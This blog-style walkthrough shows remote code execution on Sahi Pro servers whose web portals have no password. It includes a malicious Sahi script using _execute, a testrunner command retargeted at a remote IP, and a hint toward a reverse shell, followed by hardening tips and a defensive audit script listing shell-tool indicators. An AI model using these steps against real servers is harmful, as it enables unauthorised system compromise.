Hi all. Today I will explain how to pwn a misconfigured Sahi Pro automation server.
What is Sahi Pro?
Sahi Pro is a popular, leading automation tool that helps enterprises automate their web, desktop and mobile application test scenarios.
It is a tough competitor to other automation tools such as QTP and Selenium. As per my experience, Sahi Pro is much better than the other tools mentioned in a few aspects (object spy and relative APIs).
Sahi Pro allows automation testers to write code either in its own Sahi language (a wrapper around JS with a full-fledged API), in Ruby, etc.
I, being a former automation test engineer, would recommend the Sahi language for automating test scenarios.
In this post, we will concentrate on the web application automation aspect.
Sahi has some other nice extra features (*interesting* from an attacker's point of view) such as a web-based text editor, a web-based configuration and reports console, and remote execution on other machines on the same network.
Why would one keep Sahi Pro running all the time?
In an enterprise environment there are unattended suite executions running all the time, which can last 8 to 24 hours without any monitoring. A perfect scenario for an attacker or an internal pentester.
What do you mean by "misconfigured"?
Sahi allows end users to set a password on these web portals, which is neglected most of the time. (Trust me on this! I have seen it too many times. Many do not even know they can set a password on these portals!) (I hope Sahi also adds brute-force-proof login forms in the next release.)
This looks promising. How much can we get out of it?
We will see how to gain remote code execution on the target machine running Sahi Pro with this simple misconfiguration.
So basically, to gain remote code execution on these servers we can divide the work into the following steps:
- Upload a malicious Sahi script which executes the commands we want.
- Find a way to execute that script remotely from another machine on the same network.
- Finally, find a way to fetch the results of our task.
Step 1: upload a malicious Sahi script
As I mentioned earlier, Sahi has a web-based editor for creating script and suite files. By default Sahi listens on port 9999.
When no password is set, this portal can be reached by anyone on the network. Let's access a remote web portal and create our malicious Sahi file.
Fig 1: the created malicious Sahi script.
Here is the code for the malicious Sahi script (the original shows it on a single line, which is not valid syntax; the statements are separated here):
var $tc1 = _testcase("TC-1", "lets get some code execution.").start();
_navigateTo("https://google.com");
_selectWindow("/google/");
// isSync = true: block until the command finishes and return its output as a string
$cmd_output1 = _execute("whoami", true);
$cmd_output2 = _execute("ipconfig", true);
_log("command output1 : " + $cmd_output1);
_log("command output2 : " + $cmd_output2);
$tc1.end();
In our code we use the _testcase API so that everything runs as a single test case (uniform reporting). We make use of the "_execute" API, which executes system commands and external files (bat, sh, etc.).
From the Sahi documentation, this API has the following syntax:
_execute($cmd[, $isSync[, $timeout]])
The first parameter is the command to be executed. The second parameter is set to true in our case (isSync = true), so the result is returned only once the command has completed. The API returns the output of the command as a string.
We finally print the resulting command output using the "_log" API, so it ends up in the report.
Step 2: find a way to execute the malicious file
Each Sahi Pro installation comes with a "testrunner" file which lets us start suite executions or run single scripts from the command prompt.
Suite files (*.suite) contain a list of Sahi script names to be executed. They are very useful for complex scenarios that involve multiple .sah files.
By default testrunner.bat only executes suite/Sahi files on the local machine. We can make it execute scripts on remote machines by editing the file: change the host and port parameters from "localhost" and "9999" to either a parameter or a hard-coded value of our choice. (testrunner.bat is located at userdata/bin/testrunner.bat.)
In our case, the target is 192.168.0.104 and the port is left at the default 9999.
Modified line:
java -cp %SAHI_HOME%\lib\ant-sahi.jar in.co.sahi.distributed.DSahiRunner %CUSTOM_FIELDS% -isNonDistributedRun true -scriptsPathMaster %SCRIPTS_PATH% -suite %1 -browserDeviceParams %3 -logsInfo "%LOGS_INFO%" -baseURL "%START_URL%" -host 192.168.0.104 -port 9999 -threads %THREADS% -abortedRetryCount %ABORTED_RETRY_COUNT% -failureRetryCount %FAILURE_RETRY_COUNT% -useSingleSession %SINGLE_SESSION% -sendEmail %SEND_EMAIL_REPORT% -emailTrigger "%EMAIL_TRIGGER%" -emailProperties "%EMAIL_PROPERTIES%" -sendEmailPeriodically "%SEND_EMAIL_REPORT_PERIODICALLY%" -sendEmailPeriodicallyTime "%SEND_EMAIL_REPORT_PERIODICALLY_TIME%" -emailPasswordHidden "%EMAIL_PASSWORD_HIDDEN%" -showPeriodicSummary %SHOW_PERIODIC_SUMMARY% -tags %4
So do we need a Sahi installation on our own system to execute this? (Sahi also has an open source version, which you can download for free.)
Nope! We will see how to skip that later.
Now let's execute the script on the remote system using testrunner.bat!
Command format:
testrunner.bat rce.sah https://google.com ie
The first parameter is the file to be executed, the second specifies the start URL, and the third specifies the browser to launch on the remote system.
(Remember I said we do not need to install Sahi Pro? In the screenshot above you can see that testrunner has turned our task into a plain HTTP request URL. Grab that URL, change the script name and host name, and you can trigger the execution remotely without installing Sahi on the attacker machine.)
Step 3: fetch the results of our execution
Once the returned status is success, we can see the results in the reports portal.
Now let's look at the report for our specific execution:
We get code execution! Awesome! We can extend this to a reverse shell by uploading a PowerShell script through the same editor and calling it from the malicious Sahi file (there is no restriction on the type of file that can be created).
How can I harden my Sahi instance against such attacks?
>> Password protect the Sahi Pro web portals (editor, configuration and reports). If you are running with default credentials, change them to strong ones.
>> Define fine-grained file access using the option provided in the Sahi Pro configuration, so the editor cannot create or modify arbitrary files.
>> Keep in mind that any .sah file a tester can write can call _execute, so review scripts that reach your unattended execution hosts.
Have a good day! 🙂
Update: this is a full-fledged RCE. Sahi Pro does not perform any server-side checks on requests that are supposed to be authenticated, so the functional endpoints can be called directly. There is no patch as of this date.
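The hardening advice above is only about locking the door; it does not tell you whether someone already walked through it. The script below is an added example (not part of the original post and not a Sahi Pro tool) that audits a scripts directory for _execute calls like the ones used in the attack, so a defender can review what their unattended suites are actually allowed to run. The indicator list and the two sample .sah files it creates are constructed for the demo; the regex only recognises the _execute call shape documented on this page.

```python
"""Audit Sahi script files (.sah) for _execute calls and rate each one.

Added example, not Sahi Pro's own code. Verdicts:
  suspicious - argument contains a recon/shell indicator (constructed list)
  dynamic    - argument is not a string literal (built at runtime, inspect by hand)
  literal    - a plain string literal with no indicator
"""
import re
import tempfile
from pathlib import Path

# _execute( <first argument> ... ): capture the first argument up to the first
# comma or closing paren. Sahi scripts are JS-like, so the argument may be a
# string literal ("whoami") or a variable ($cmd).
_EXECUTE_RE = re.compile(r"_execute\s*\(\s*(?P<arg>[^,)]*)")

# Constructed starting list of indicators; tune it for your own suites.
SUSPICIOUS = (
    "whoami", "ipconfig", "ifconfig", "net user", "net localgroup",
    "powershell", "cmd.exe", "cmd /c", "bash -i", "/bin/sh", "nc ", "ncat",
    "curl ", "wget ", "certutil", "-enc", "base64", "invoke-expression",
)

# Constructed samples: the attack script from this post, and a benign-looking
# script that also calls _execute with a value read at runtime.
RCE_SAMPLE = """var $tc1 = _testcase("TC-1", "lets get some code execution.").start();
_navigateTo("https://google.com");
_selectWindow("/google/");
$cmd_output1 = _execute("whoami", true);
$cmd_output2 = _execute("ipconfig", true);
_log("command output1 : " + $cmd_output1);
$tc1.end();
"""
SMOKE_SAMPLE = """var $tc = _testcase("TC-2", "reset fixture before login test").start();
_execute("reset_fixture.bat", true);
var $cmd = $fixtureCommand;
_execute($cmd, true);
$tc.end();
"""


def find_execute_calls(script_text):
    """Return [(line_no, first_argument)] for every _execute call in a script."""
    calls = []
    for line_no, line in enumerate(script_text.splitlines(), start=1):
        for match in _EXECUTE_RE.finditer(line):
            calls.append((line_no, match.group("arg").strip()))
    return calls


def classify(arg):
    """Rate one _execute argument as 'suspicious', 'dynamic' or 'literal'."""
    lowered = arg.lower()
    if any(indicator in lowered for indicator in SUSPICIOUS):
        return "suspicious"
    if not lowered.startswith(('"', "'")):
        return "dynamic"  # not a literal: command is assembled at runtime
    return "literal"


def audit_scripts(root):
    """Walk root for .sah files and return one finding dict per _execute call."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*.sah")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for line_no, arg in find_execute_calls(text):
            findings.append({
                "file": str(path.relative_to(root)),
                "line": line_no,
                "arg": arg,
                "verdict": classify(arg),
            })
    return findings


def demo():
    """Write the constructed samples to a temp dir and audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "rce.sah").write_text(RCE_SAMPLE, encoding="utf-8")
        Path(tmp, "smoke.sah").write_text(SMOKE_SAMPLE, encoding="utf-8")
        return audit_scripts(tmp)


if __name__ == "__main__":
    # Point audit_scripts() at your real userdata/scripts directory instead.
    for finding in demo():
        print(f"{finding['verdict']:10} {finding['file']}:{finding['line']}  {finding['arg']}")
```

Run it against the userdata/scripts directory of each execution host. Anything rated suspicious deserves the same treatment as a compromised credential, and anything rated dynamic needs a human to work out where the command string comes from, because a value read from a file or a test parameter is exactly how a reverse-shell payload would be smuggled past a naive literal-only check.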